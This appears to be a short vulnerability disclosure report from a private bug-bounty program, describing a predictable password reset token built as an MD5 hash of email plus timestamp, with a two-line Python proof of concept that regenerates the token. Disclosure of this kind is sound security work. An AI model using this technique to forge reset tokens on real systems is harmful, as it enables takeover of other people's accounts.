Auth Bypass Private Program 2025-03-01
Predictable Password Reset Token
Severity: Critical | Status: Resolved
Summary
Reset tokens were MD5 hashes of (email + timestamp), allowing prediction and account takeover.
Proof of Concept
import hashlib
token = hashlib.md5(f"{email}{timestamp}".encode()).hexdigest()
# Generated token matches actual reset linkImpact
Account takeover of any user by predicting their reset token.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.